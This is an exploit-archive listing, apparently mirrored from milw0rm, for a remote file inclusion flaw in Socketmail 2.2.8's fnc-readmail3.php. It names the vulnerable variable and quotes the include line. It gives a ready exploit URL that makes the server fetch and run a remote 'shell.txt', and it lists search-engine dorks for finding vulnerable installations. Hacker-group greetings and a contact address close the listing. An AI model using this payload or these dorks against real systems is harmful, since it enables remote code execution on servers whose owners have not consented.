[] NeoSense
E X P L O I T S
title author type platform port cve id

Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion

Author: BiNgZa
type: webapps
platform: php
port: 
date_added: 2007-10-21 
date_updated:  
verified: 1 
codes: OSVDB-40390;CVE-2007-5627 
tags: 
aliases:  
screenshot_url:  
application_url: 
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:

----------------------------------------------
} else {
    include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm, str0ke

BiG sHoUt OuT tO udplink.net

FoUnD By BiNgZa

DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"

DORK2: "Powered by SocketMail"

shadowcrew@hotmail.co.uk

shadow.php0h.com

# milw0rm.com [2007-10-22]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.